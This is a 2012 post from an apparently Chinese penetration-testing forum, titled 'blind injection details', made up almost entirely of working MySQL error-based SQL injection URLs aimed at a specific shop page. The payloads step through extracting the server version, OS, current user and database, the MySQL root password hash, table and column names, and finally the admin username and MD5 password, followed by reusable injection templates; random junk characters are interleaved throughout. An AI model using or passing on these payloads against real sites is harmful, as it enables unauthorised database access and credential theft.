中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]

作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号 2 f1 r) v2 V) R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 ^7 _! `$ b! H
+ ?% f' x  Y, d& Y* j7 ~& y判断系统
, V# I+ q5 T9 Y4 d9 g9 P4 {3 Y) O- a. u* V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 y  t$ V" [$ p9 T7 S# V" K! R; k' W' |

; E( w$ k6 X. B% ?. p& A2 O5 Q$ ^% w& J) _3 D2 ]) z

* q0 k5 J3 v5 i& t& \2 ^当前 user()2 n0 w# `0 g( A6 s: d) _2 ?

: I+ ^, E0 d. V0 w8 ^8 ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 B6 y7 ^9 d  J( n1 |3 r

* I: q& T( P: E7 w% T# W& d* t
" |( f' O% H& i/ n, P. O. h) l$ y
当前 database()
/ m, I3 I9 L" S9 i' |$ b0 Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% t/ O$ e0 E1 b# g4 ~9 A$ n6 C" _9 t  B$ r
9 y/ o4 w; ?/ F* _

. d3 E1 {; O! P! V3 M. K" J6 P
! l1 ~% X3 ~# m6 M; X: a- Yroot hash
% ~4 t( k3 W, V/ c4 ?; q* g, V1 t, O( q( S% ~
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ i) \$ Z) g( c" {& `
  Y  p* d; a& v4 A+ R' i4 s& b

  W, l5 S/ s7 y- F9 Z; p0 p当前 数据库表名
2 B# T# @) y9 ^9 @9 ^) \* `4 ~8 H- x; }6 m! v  A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  i4 `* X% P3 z  \

* I/ W' z; \+ f3 |5 v) ^7 J5 L7 z  i
: g3 y; X7 X: R6 Y, ]- U2 k' z0 N# S  G; F: j( Q2 W9 f
当前 数据库 user_name 字段) O0 t$ }" n! T* q$ A
2 w% o' t1 m, S, i
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* p; o. t8 A+ r# Y# d- W

6 ?( ^) M, i( t9 b; A当前 数据库 字段 password' E6 g6 e  i" q  f) Z* Y$ T
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 \! L0 g' {/ u5 y9 c9 q
& t% b9 w5 s7 ~) i! Z

& Q& P% p3 p8 D" C9 r! @' u
3 z* U, m. Y# {6 q7 v5 k* a获得 admin passwd(md5)
9 f3 I6 z, |4 u3 U
6 I. F7 \0 r( k! [# u2 _. Q0 c
- X9 y1 t1 Q& ^9 J$ c8 f6 Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% I* t4 X$ J5 v5 a2 Q# |
8 |" v" w) w* j3 M: K1 x报错注射
" J7 c3 e$ Q* D4 v8 W/ V9 xSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ F; I* z) j# B" q

, z: P' b. K, }6 D8 I/ ASELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)* a" M7 l4 e; K5 x7 a- G

1 t2 L0 Q" B) b! P) g: Mand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2